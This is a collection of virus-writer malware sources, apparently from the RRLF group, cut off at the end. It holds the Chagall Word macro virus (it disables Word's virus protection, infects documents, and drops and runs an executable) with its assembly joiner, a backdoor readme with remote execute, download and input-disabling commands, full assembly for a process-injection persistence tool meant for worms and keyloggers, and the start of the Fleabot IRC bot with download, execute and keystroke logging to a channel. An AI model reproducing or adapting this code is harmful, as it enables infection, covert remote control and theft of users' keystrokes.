RegPath & "Level", 1, "REG_DWORD" Shell.RegWrite RegPath & "AccessVBOM", 1, "REG_DWORD" N.DeleteLines 1, N.CountOfLines N.InsertLines 1, "Private Sub Document_Close()" N.InsertLines 2, "On Error Resume Next" N.InsertLines 3, "Options.VirusProtection = False" N.InsertLines 4, "Options.SaveNormalPrompt = False" N.InsertLines 5, "Options.ConfirmConversions = False" N.InsertLines 6, "Set VirCode = NormalTemplate.VBProject.VBComponents(1).CodeModule" N.InsertLines 7, "Set ActiveD = ActiveDocument.VBProject.VBComponents(1)" N.InsertLines 8, "Set ActCode = ActiveD.CodeModule" N.InsertLines 9, "If ActiveD.Name = ""Chagall"" Then" N.InsertLines 10, "GoTo DropExe" N.InsertLines 11, "Else" N.InsertLines 12, "ActCode.DeleteLines 1, ActCode.CountOfLines" N.InsertLines 13, "ActCode.InsertLines 1, VirCode.Lines(1, VirCode.CountOfLines)" N.InsertLines 14, "ActiveD.Name = ""Chagall""" N.InsertLines 15, "End If" N.InsertLines 16, "DropExe:" N.InsertLines 17, "Dim AExeFile As String" N.InsertLines 18, "Dim NExeFile As String" N.InsertLines 19, "AExeFile = ActiveDocument.Variables(""llagahc"").Value" N.InsertLines 20, "NExeFile = Normal.ThisDocument.Variables(""llagahc"").Value" N.InsertLines 21, "If NExeFile = """" Then" N.InsertLines 22, "Open Environ(""WinDir"") & ""\Chag.wrd"" For Binary As #1" N.InsertLines 23, "NExeFile = Space(LOF(1))" N.InsertLines 24, "Get #1, , NExeFile" N.InsertLines 25, "Close #1" N.InsertLines 26, "Normal.ThisDocument.Variables.Add ""llagahc"", NExeFile" N.InsertLines 27, "End If" N.InsertLines 28, "If AExeFile = """" Then" N.InsertLines 29, "ActiveDocument.Variables.Add ""llagahc"", NExeFile" N.InsertLines 30, "End If" N.InsertLines 31, "Open Left(Environ(""WinDir""), 3) & ""Chag32.exe"" For Binary As #1" N.InsertLines 32, "Put #1, , NExeFile" N.InsertLines 33, "Close #1" N.InsertLines 34, "Shell Left(Environ(""WinDir""), 3) & ""Chag32.exe""" N.InsertLines 35, "If Left(ActiveDocument.Name, 2) = ""Do"" And IsNumeric(Right(ActiveDocument.Name, 1)) = True Then" N.InsertLines 36, "ActiveDocument.Saved = True" N.InsertLines 37, "Else" N.InsertLines 38, "ActiveDocument.SaveAs ActiveDocument.FullName" N.InsertLines 39, "End If" N.InsertLines 40, "End Sub" Word.Quit ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall VBS Part - Chagall.vbs ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EQU Part - size.equ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; VirusSize equ 2205d ;packed with fsg! WordDropSize equ 2671d SomethinFalse equ 1313d ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EQU Part - size.equ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall Parts Joiner - Joiner.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include "%fasminc%\win32ax.inc" include "size.inc" .data Win32PartName db "Chagall.exe",0 Win32PartHandle dd ? Win32PartBuffer rb VirusSize WordPartName db "Chagall.vbs", 0 WordPartHandle dd ? WordPartBuffer rb WordDropSize OutputFileName db "ReadyChagall.exe",0 OutputFileHandle dd ? BytesRead dd ? BytesWrite dd ? .code Joiner: ;*****read win32 and word part into buffer************ mov ebx, Win32PartName mov ecx, GENERIC_READ mov edx, OPEN_EXISTING call OpenFile_ mov dword [Win32PartHandle], eax cmp ecx, SomethinFalse je CantReadWin32Part mov ebx, Win32PartHandle mov ecx, Win32PartBuffer mov edx, VirusSize call ReadInBuffer cmp ecx, SomethinFalse je CantReadWin32Part invoke CloseHandle,\ dword [Win32PartHandle] mov ebx, WordPartName mov ecx, GENERIC_READ mov edx, OPEN_EXISTING call OpenFile_ mov dword [WordPartHandle], eax cmp ecx, SomethinFalse je CantReadWordPart mov ebx, WordPartHandle mov ecx, WordPartBuffer mov edx, WordDropSize call ReadInBuffer cmp ecx, SomethinFalse je CantReadWordPart invoke CloseHandle,\ dword [WordPartHandle] ;*****read win32, firstgen and word part into buffer***end****** ;*****write win32, firstgen and word part to file*************** mov ebx, OutputFileName mov ecx, GENERIC_WRITE mov edx, CREATE_ALWAYS call OpenFile_ mov dword [OutputFileHandle], eax cmp ecx, SomethinFalse je CantCreateOutputFile mov ebx, OutputFileHandle mov edx, Win32PartBuffer mov ecx, VirusSize call WriteToFile cmp ecx, SomethinFalse je CantWriteWin32Part mov ebx, OutputFileHandle mov edx, WordPartBuffer mov ecx, WordDropSize call WriteToFile cmp ecx, SomethinFalse je CantWriteWordPart invoke CloseHandle,\ dword [OutputFileHandle] invoke MessageBox,\ 0,\ "OutputFile successfully written. Take care, now it is a living VIRUS!",\ "success - Win32/Word.Chagall is now working",\ MB_ICONINFORMATION jmp Exit ;*****write win32, firstgen and word part to file*************** ;*****error messages******************************************** CantReadWin32Part: invoke MessageBox,\ 0,\ "Cant read the Win32 part into buffer",\ "error",\ MB_ICONERROR jmp Exit CantReadWordPart: invoke MessageBox,\ 0,\ "Cant read the Word part into buffer",\ "error",\ MB_ICONERROR jmp Exit CantCreateOutputFile: invoke MessageBox,\ 0,\ "Cant create the output file",\ "error",\ MB_ICONERROR jmp Exit CantWriteWin32Part: invoke MessageBox,\ 0,\ "Cant write the Win32 part to the output file",\ "error",\ MB_ICONERROR jmp Exit CantWriteWordPart: invoke MessageBox,\ 0,\ "Cant write the Word part to the output file",\ "error",\ MB_ICONERROR ;*****error messages***end************************************** Exit: invoke ExitProcess,\ 0 ;*****Procedures Open, Read and Write files********************* OpenFile_: invoke CreateFile,\ ebx,\ ;edx - flags (CREATE_ALWAYS...OPEN_EXISTING) ecx,\ ;ebx - filename to open FILE_SHARE_READ + FILE_SHARE_WRITE,\ ;ecx - GENERIC_READ .. GENERIC_WRITE 0,\ edx,\ FILE_ATTRIBUTE_NORMAL,\ 0 cmp eax, INVALID_HANDLE_VALUE jne OpenFileEnd mov ecx, SomethinFalse jmp OpenFileReturn OpenFileEnd: mov ecx, 0 OpenFileReturn: ret ReadInBuffer: invoke ReadFile,\ ;ebx - pointer to file handle dword [ebx],\ ;ecx - pointer to buffer start ecx,\ ;edx - size to read edx,\ BytesRead,\ 0 cmp eax, 0 jne ReadInBufferEnd mov ecx, SomethinFalse jmp ReadBufferReturn ReadInBufferEnd: mov ecx, 0 ReadBufferReturn: ret WriteToFile: invoke WriteFile,\ dword [ebx],\ ;ebx - file handle edx,\ ;edx - start address of buffer ecx,\ ;ecx - size to write BytesWrite,\ 0 cmp eax, 0 jne WriteToFileEnd mov ecx, SomethinFalse jmp WriteToFileReturn WriteToFileEnd: mov ecx, 0 WriteToFileReturn: ret ;*****Procedures Open, Read and Write files***end*************** .end Joiner ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall Parts Joiner - Joiner.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

sources

Bockdoor.Gnaaarly DiA Bockdoor.Gnaaarly by DiA/rrlf (c) 2005 DiA_hates_machine@gmx.de - www.vx-dia.de.vu ########################################### Disclaimer: I am not respnsible for any damage you make with this tool. Just use it to learn how winsock and all the other stuff work. Or to annoy your brother or classmate a little bit, but no destruction! Take care. Features: -listen to port 30687 for connections -accept connections from computers in the network -awaiting commands -execute commands -reply if it had success -if it fails it reply a formated system error in your language -close client, and server is still running -after server is closed no commands anymore ;) Commands: Fun: !msgbox 'Caption' 'Message' - shows a message box !mouse 'disable/enable' - disables or enables mouse !input 'disable/enable' - disables or enables keyboard and mouse !cdrom 'open/close' - open or close cd-rom !start 'hide/show' - hide or show windows start button !monitor 'on/off' - turns monitor on or off Examples: !msgbox 'Gnaaarly Backdoor' 'A gnaaarly backdoor is running...' !mouse 'disable' !mouse 'enable' !input 'disable' !input 'enable' !cdrom 'open' !cdrom 'close' !start 'hide' !start 'show' !monitor 'off' !monitor 'on' Paths: !windowspath - returns windows directory !systempath - returns system directory !location - returns the location of the running server !getdirectory - returns the current directory !setdirectory 'Path' - set a new current directory Examples: !setdirectory 'C:\Windows' Lists: !dirlist 'Path' - list all directorys in path !filelist 'Path' - list all directorys in path Examples: !dirlist 'D:\' !filelist 'C:' Files: !copyfile 'Existing' 'New' - copy a file, do not copy if already exist !movefile 'Existing' 'New' - move a file, do not move if already exist !deletefile 'Existing' - deletes an existing file Examples: !copyfile 'C:\Windows\Notepad.exe' 'C:\Editor.exe' !movefile 'C:\Editor.exe' 'C:\edit.exe' !deletefile 'C:\edit.exe' Registry: !regwrite 'HKEY' 'Subkey' 'Name' 'Value' - write a string to the registry !regread 'HKEY' 'Subkey' 'ValueName' - returns a string from registry Examples: !regwrite 'HKEY_CURRENT_USER' 'Console' 'FaceName' 'Gnaaarly' !regread 'HKEY_LOCAL_MACHINE' 'SOFTWARE\Microsoft\Windows\CurrentVersion' 'ProductId' Applications: !execute 'Path' - executes a application Examples: !execute 'C:\Windows\Notepad.exe' Internet: !download 'URL' 'Path' - download a file from inet to local Examples: !download 'http://home.arcor.de/vx-dia/index.htm' 'C:\firstpage.htm' Exit Windows: !shutdown - shutdown windows !reboot - reboot windows Clipboard: !getclipboard - returns the text in the clipboard if exist !setclipboard 'Text' - copy a new text into clipboard Examples: !setclipboard 'visit www.vx-dia.de.vu !!!' Connection: !close Clients: I made 2 clients, a console based in C++ and a GUI in VB. Fell free to use both. To Do for you: This tool is not made to be evil. So if you want it evil you should: -remove that start message -remove error message -do autostart -make a nice icon -add more commands ;) Source: Please feel free to edit this tool, show it to friends and distribute it. For thanks or fucks drop me a mail to DiA_hates_machine@gmx.de Source Code Copyleft: DiA(c)2005 Ready Ranger Liberation Front pS: Big greets fly's out to my little beta tester, SPTH, thanx, have fun...

sources

TakeCareOnMe 1.0 DiA ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° TakeCareOnMe 1.0 by DiA/RRLF (c)2006 °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° DiA_hates_machine@gmx.de - http://www.vx-dia.vu °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° What's that? °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° This is a small utility (1305 bytes compressed with FSG) wich is able to keep your application °°°°; ;°°°°° alive, can be your worm, your keylogger or the anoying program you wrote for some fucker. °°°°; ;°°°°° The program injects some code in Explorer that infinite check if your program is still running °°°°; ;°°°°° if not so, it restarts it. Only way out is to terminate Explorer process, and wich normal dude °°°°; ;°°°°° is doing this... °°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° How to use it? °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° Pretty easy, just call this program with full path of the program you want to stay alive. As °°°°; ;°°°°° example we want that the Calculator stays active, and restarts if it got closed, we call this °°°°; ;°°°°° program with parameter "C:\WINDOWS\System32\Calc.exe" (on normal installed XP). See syntax: °°°°; ;°°°°° %full path%\TakeCareOnMe 1.0.exe <full path of application you want to take care for> °°°°; ;°°°°° example: C:\WINDOWS\t com.exe C:\WINDOWS\System32\Calc.exe °°°°; ;°°°°° How easy huh? You just make sure that you call this program with full path, and give the full °°°°; ;°°°°° path of the application you want to stay alive. Thats all. °°°°; ;°°°°° I just included this tool in my worm "Tamiami" and recocnized that the parameter extraction °°°°; ;°°°°° just works when there is a space inside of the path of TakeCareOnMe. So you may want to change °°°°; ;°°°°° this in source, this is the way: °°°°; ;°°°°° No space in path => then the first space ("...exe C:\...") is the parameter begin (+1) °°°°; ;°°°°° With space in path => last " is parameter begin (+2) °°°°; ;°°°°° Just don't mind and copy this tool with a space in filename, as example name it "t com.exe". °°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° Huh? How what huh?! °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° include "%fasminc%\win32ax.inc" °°°°; ;°°°°° °°°°; ;°°°°° .data °°°°; ;°°°°° Exec db "C:\MyAsm\Codes\TCOM\t com.exe C:\WINDOWS\System32\Calc.exe", 0 °°°°; ;°°°°° °°°°; ;°°°°° .code °°°°; ;°°°°° start: °°°°; ;°°°°° invoke WinExec,\ °°°°; ;°°°°° Exec,\ °°°°; ;°°°°° SW_SHOW °°°°; ;°°°°° °°°°; ;°°°°° invoke ExitProcess,\ °°°°; ;°°°°° 0 °°°°; ;°°°°° °°°°; ;°°°°° .end start °°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° What else? °°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; ;°°°°° As always you are responsible for your actions. °°°°; ;°°°°° Here a little idea, just write your Worm (or whatever) binary to memory too, if it got °°°°; ;°°°°° terminated AND deleted, write it back to disk and execute it again. That's all, visit °°°°; ;°°°°° http://www.vx-dia.de.vu right now! Thanx to izee for beta testing. °°°°; ;°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°; include "%fasminc%\win32ax.inc" entry TakeCareOnMe ;code start macro _invoke proc,[arg] ;modified invoke macro, { common ;call with delta offset if ~ arg eq reverse pushd arg common end if call [ebp + proc] } section '.code' code readable writeable executable RemoteThreadStart: call DeltaOffset ;to get right addresses DeltaOffset: pop ebp sub ebp, DeltaOffset ;difference now in ebp CareStart: mov dword [ebp + ProcessEntry.dwSize], sizeof.PROCESSENTRY32 ;fill structure with its size lea ebx, dword [ebp + ProcessEntry] ;ebx holds address of structure _invoke _CreateToolhelp32Snapshot,\ ;snapshot of processes 2,\ ;TH32CS_SNAPPROCESS edx ;pointer to structure cmp eax, 0 ;error? je ReturnThread mov dword [ebp + SnapHandle], eax ;save handle _invoke _Process32First,\ ;find first process dword [ebp + SnapHandle],\ ebx ;ProcessEntry address cmp eax, 0 je ReturnThread NextProcess: lea eax, dword [ebp + ProcessEntry.szExeFile] lea edx, dword [ebp + CareForShort] _invoke _lstrcmpi,\ eax,\ ;is found process edx ;the process to take care for? cmp eax, 0 je CareForRuns ;if so no need to restart, sleep _invoke _Process32Next,\ ;next process dword [ebp + SnapHandle],\ ebx ;ProcessEntry cmp eax, 0 ;search all processes? je CareForRestart ;restart our process then lea eax, dword [ebp + NextProcess] jmp eax CareForRuns: _invoke _CloseHandle,\ dword [ebp + SnapHandle] ;close snapshot handle _invoke _Sleep,\ ;sleep 10 seconds 10000d lea eax, dword [ebp + CareStart] jmp eax CareForRestart: _invoke _CloseHandle,\ dword [ebp + SnapHandle] lea eax, dword [ebp + CareForFull] lea ebx, dword [ebp + StartupInfo] lea edx, dword [ebp + ProcessInfo] _invoke _CreateProcess,\ ;program to care for gots closed, restart eax,\ 0,\ 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ ebx,\ edx _invoke _Sleep,\ 1000d ;sleep 1 second lea eax, dword [ebp + CareStart] jmp eax ReturnThread: ret ;return remote thread RemoteDatas: CareForFull rb 256d CareForShort rb 256d ProcessEntry PROCESSENTRY32 SnapHandle dd ? StartupInfo STARTUPINFO ProcessInfo PROCESS_INFORMATION _CreateToolhelp32Snapshot dd ? _Process32First dd ? _Process32Next dd ? _lstrcmpi dd ? _CloseHandle dd ? _Sleep dd ? _CreateProcess dd ? RemoteThreadEnd: Datas: Kernel32Handle dd ? ProcessEntryOwn PROCESSENTRY32 SnapHandleOwn dd ? ProcessHandle dd ? BaseAddress dd ? APITable db "CreateToolhelp32Snapshot", 0 db "Process32First", 0 db "Process32Next", 0 db "lstrcmpiA", 0 db "CloseHandle", 0 db "Sleep", 0 db "CreateProcessA", 0, 13d TakeCareOnMe: invoke GetCommandLine inc eax ;skip " mov ecx, 0 ;counter to zero SearchOwnEnd: cmp byte [eax + ecx], '"' ;is end " je HaveOwnEnd ;counter++ inc ecx jmp SearchOwnEnd HaveOwnEnd: ;erase own name add eax, ecx ;erase "{space} add eax, 2d mov ecx, 0 ;zero counter SearchParameterEnd: cmp byte [eax + ecx], 0 ;end of string? je HaveParameterEnd inc ecx jmp SearchParameterEnd HaveParameterEnd: mov esi, eax ;source index mov edi, CareForFull ;destination rep movsb ;mov [ecx] bytes from source to destination mov ecx, 0 ;zero counter SearchShortEnd: cmp byte [eax + ecx], "." ;search for .(exe) je SearchShortStart inc ecx jmp SearchShortEnd SearchShortStart: cmp byte [eax + ecx], "\" ;search for last "\" je HaveShortStart dec ecx ;search backwards jmp SearchShortStart HaveShortStart: add eax, ecx ;begin inc eax ;skip "\" mov ecx, 0 ;zero counter GetShortLength: cmp byte [eax + ecx], 0 ;end of string? je HaveShortLength inc ecx jmp GetShortLength HaveShortLength: mov esi, eax ;source mov edi, CareForShort ;destination rep movsb ;length copy cmp byte [CareForFull], 0 ;no parameter? je Exit ;then i have nothing to do invoke LoadLibrary,\ ;load kernel32.dll "kernel32.dll" ;to get api addresses cmp eax, 0 je Exit mov dword [Kernel32Handle], eax mov ebx, APITable ;start of api strings mov edx, _CreateToolhelp32Snapshot ;start of address storage push edx ;edx get changed while api calls NextAPI: invoke GetProcAddress,\ dword [Kernel32Handle],\ ;kernel32.dll ebx ;pointer to api string pop edx mov dword [edx], eax ;save proc address add edx, 4d ;jump to next save address (+dd) push edx mov ecx, 0 SearchNextAPI: cmp byte [ebx + ecx], 0 ;api end? je HaveNextAPI inc ecx jmp SearchNextAPI HaveNextAPI: add ebx, ecx ;end of last api inc ebx ;start of next api cmp byte [ebx], 13d ;end of api table? je HaveAllAPI jmp NextAPI HaveAllAPI: invoke FreeLibrary,\ ;oww, i have so good coding style dword [Kernel32Handle] mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32 ;set size to structure invoke _CreateToolhelp32Snapshot,\ ;why dont use it a second time? :) 2,\ ;TH32CS_SNAPPROCESS 0 cmp eax, 0 ;error? je Exit ;then we cant inject mov dword [SnapHandleOwn], eax ;save handle invoke _Process32First,\ ;again, we already have the address by GetProcAddress dword [SnapHandleOwn],\ ;but use another address of handle then in thread ProcessEntryOwn ;here too NextTargetProcess: ;check next cmp eax, 0 ;error, explorer.exe not found je Exit invoke _lstrcmpi,\ ProcessEntryOwn.szExeFile,\ ;is found process "explorer.exe" ;explorer? cmp eax, 0 je FoundExplorer ;if so i found explorer invoke _Process32Next,\ dword [SnapHandleOwn],\ ProcessEntryOwn jmp NextTargetProcess ;check the next process FoundExplorer: invoke _CloseHandle,\ ;close snapshot handle dword [SnapHandleOwn] invoke OpenProcess,\ ;open the explorer process PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\ ;want to operate in it, to write my thread and to execute it 0,\ dword [ProcessEntryOwn.th32ProcessID] ;the process id we got from snapshot cmp eax, 0 ;error je Exit ;**no need for VirtualProtect call, cause it would fail if we ;dont have permission to write & execute mov dword [ProcessHandle], eax ;save process handle invoke VirtualAllocEx,\ ;allocate space in the explorer process dword [ProcessHandle],\ ;i want space here 0,\ RemoteThreadEnd - RemoteThreadStart,\ ;get size of remote thread MEM_COMMIT,\ PAGE_READWRITE ;sure we want write cmp eax, 0 ;error? je Exit mov dword [BaseAddress], eax ;where is the space allocated? invoke WriteProcessMemory,\ ;write to process memore dword [ProcessHandle],\ ;to explorer dword [BaseAddress],\ ;start of buffer in memory RemoteThreadStart,\ ;start of code to write RemoteThreadEnd - RemoteThreadStart,\ ;size to write 0 cmp eax, 0 je Exit ;exit on error invoke CreateRemoteThread,\ ;now execute the written thread dword [ProcessHandle],\ ;excute in explorer context 0,\ 0,\ dword [BaseAddress],\ ;start of process in memory 0,\ ;no parameter 0,\ 0 invoke _CloseHandle,\ dword [ProcessHandle] ;close explorer handle Exit: invoke ExitProcess,\ 0 ;work done, i take care for my lil program Pose db "TakeCareOnMe 1.0 by DiA/RRLF (c)06" ;) section '.idata' data import readable library kernel32, "kernel32.dll" import kernel32,\ GetCommandLine, "GetCommandLineA",\ LoadLibrary, "LoadLibraryA",\ GetProcAddress, "GetProcAddress",\ FreeLibrary, "FreeLibrary",\ OpenProcess, "OpenProcess",\ VirtualAllocEx, "VirtualAllocEx",\ WriteProcessMemory, "WriteProcessMemory",\ CreateRemoteThread, "CreateRemoteThread",\ ExitProcess, "ExitProcess"

sources

Win32.Fleabot DiA ;Win32.Fleabot by DiA/RRLF ;DiA_hates_machine@gmx.de ;http://www.vx-dia.de.vu/ ; ;Description: ; This is a small and simple IRC bot coded in assembler (use FASM to assemble). I ; wanted to write a small tutorial along with this source, but I am lazy dude ;). ; But don't cry, the code is very well commented and easy to understand. The bot ; has 12 commands, wich you can see in the example session. For greets and fucks ; use my guestbook at vx-dia.de.vu or drop me some mail to DiA_hates_machine@gmx.de ; Now have fun with this little code, assembled just 8kb baby. ; ;------- example session start------------------------------------------------------ ;[10:52] * Now talking in #test ;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx ;[10:53] <workwqbz> bot is locked, use unlock <password> ;[10:53] <DiAbolicx> ^^unlock test ;[10:53] <workwqbz> bot now unlocked ;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx ;[10:53] * workwqbz sets mode: +o DiAbolicx ;[10:53] <DiAbolicx> ^^cmds ;[10:53] <workwqbz> unlock <password> - unlock the bot ;[10:53] <workwqbz> lock - lock the bot ;[10:53] <workwqbz> raw <irc command> - send irc command to server ;[10:53] <workwqbz> dl <http url> | <save as path> - download file from http ;[10:53] <workwqbz> exec <path> - execute a application ;[10:53] <workwqbz> msgbox <title> | <message> - show fake error message ;[10:53] <workwqbz> info - get username, system directory and is admin ;[10:53] <workwqbz> livelog - start logging keys and send it to channel ;[10:53] <workwqbz> stoplog - stop logging keys ;[10:53] <workwqbz> cmds - show available commands ;[10:53] <workwqbz> version - show bot version ;[10:53] <workwqbz> quit - quit bot ;[10:53] <DiAbolicx> ^^raw privmsg #test :yes, i am here ;[10:53] <workwqbz> yes, i am here ;[10:56] <DiAbolicx> ^^dl http://127.0.0.1/calc.exe | D:\calcx.exe ;[10:56] <workwqbz> download successful ;[10:56] <DiAbolicx> ^^exec D:\calcx.exe ;[10:57] <workwqbz> successful executed ;[10:57] <DiAbolicx> ^^msgbox Fleabot | Test message, dude ;[10:57] <workwqbz> message box closed by user ;[10:57] <DiAbolicx> ^^info ;[10:57] <workwqbz> Username: Work, System directory: C:\WINDOWS\system32, Admin: No ;[10:58] <DiAbolicx> ^^version ;[10:58] <workwqbz> Fleabot - a example IRC bot in asm ;[10:58] <DiAbolicx> ^^livelog ;[10:58] <workwqbz> live keylogging thread created ;[10:58] <workwqbz> {crlf}THIS IS A TEST I TYPE THIS IN MY EDITOR AND ;[10:58] <workwqbz> KEYS ARE REDIRECTED TO THE PREDEFINED IRC CHANNEL{crlf} ;[10:58] <DiAbolicx> ^^stoplog ;[10:58] <workwqbz> keylogging thread terminated ;[10:59] <DiAbolicx> ^^quit ;[10:59] * workwqbz (~workwqbz@dianet.org) Quit (workwqbz) ;------- example session end-------------------------------------------------------- include "%fasminc%\win32ax.inc" ;equates, api's and macros making living easier entry Bot ;define code start IRCServer equ "127.0.0.1", 0 ;to this server we want to connect IRCPort equ 6667d ;connect using this port Channel equ "#test", 0 ;channel name ChannelPassword equ "test", 0 ;the channel password CommandPrefix equ "^^" ;what indicate commands BotPassword equ "test", 0 ;bot password CRLF equ 10d, 13d ;break section '.data' data readable writeable ;here our datas will be stored Version db "Fleabot - a example IRC bot in asm", 0 ;identify bot version IsLocked db 0d ;to check if bot is locked or not WSAData WSADATA ;used by WSAStartup, cleanup SocketDesc dd ? ;socket descriptor is stored here SockAddr dw AF_INET ;our sockaddr_in structure SockAddr_Port dw ? ;here we save the port SockAddr_IP dd ? ;here we save the ip SockAddr_Zero rb 8d ;unused RandomString rb 5d ;here we save a random string (a - z) for the nick Username rb 36d ;here we store the user name for nick generation UsernameSize dd 36d ;size of the buffer Nickname rb 9d ;buffer for nickname SendBuffer rb 512d ;the buffer where we store bytes to send ReturnBuffer rb 512d ;the buffer where we story things to receive ByteBuffer rb 2d ;for the RecvLine procedure Pong db "PONG " ;prefix pong message PongBuffer rb 16d ;buffer for the pong message CommandBuffer rb 128d ;buffer to store command and parameters Parameter1 rb 128d ;buffer for parameter 1 Parameter2 rb 128d ;buffer for parameter 2 InetHandle dd ? ;handle for download command UrlHandle dd ? ;handle for download command FileHandle dd ? ;handle of open files ReadNext dd ? ;how much else to download DownloadBuffer rb 1024d ;downoad kb for kb BytesWritten dd ? ;for writefile StartupInfo STARTUPINFO ;for create process ProcessInfo PROCESS_INFORMATION ;for create process SystemDir rb 256d ;buffer for system dir ThreadId dd ? ;for creating live keylog thread ThreadHandle dd ? ;store handle for thread ThreadExitCode dd ? ;for terminating thread KeylogBuffer rb 60d ;buffer for key strokes section '.code' code readable executable ;code section Bot: ;lets start invoke WSAStartup,\ ;initiates sockets DLL 0101h,\ ;use version 1.1 WSAData ;pointer to wsadata strcuture cmp eax, 0 ;successful? jne Exit ;if not exit bot invoke socket,\ ;create a socket AF_INET,\ ;family SOCK_STREAM,\ ;two way connection 0 ;no particular protocol cmp eax, -1 ;successful? je Exit ;if not exit mov dword [SocketDesc], eax ;save socket descriptor invoke inet_addr,\ ;covert ip string to dword IRCServer ;the ip as string mov dword [SockAddr_IP], eax ;save ip in sockaddr structure invoke htons,\ ;convert port to the network byte order IRCPort ;the port mov word [SockAddr_Port], ax ;save it in the structure invoke connect,\ ;now connect to server dword [SocketDesc],\ ;the socket descriptor SockAddr,\ ;pointer to the sockaddr structure 16d ;size of this structure cmp eax, 0 ;successful? jne Exit ;if not exit call GenerateNickname ;generate the nickname invoke lstrcpy,\ ;copy NICK to send buffer SendBuffer,\ ;pointer "NICK " ;nick command invoke lstrcat,\ ;append the nickname SendBuffer,\ ;to this Nickname ;from this call SendLine ;send buffer to irc server invoke lstrcpy,\ ;copy USER to send buffer SendBuffer,\ ;to this "USER " ;from this invoke lstrcat,\ ;append the nickname SendBuffer,\ ;to this Nickname ;from this invoke lstrcat,\ ;append usermode SendBuffer,\ ;to this " 8 * :" ;usermode invoke lstrcat,\ ;append nickname for user message SendBuffer,\ ;to this Nickname ;from this call SendLine ;send buffer to server GetMotd: ;we can join when "MOTD" message is over call RecvLine ;get a line from server call HandlePing ;handle ping mov ecx, 0 ;clear counter IsMotd: ;check for "MOTD" cmp dword [ReturnBuffer + ecx], "MOTD" ;is there "MOTD"? je HaveMotd ;then we can join cmp byte 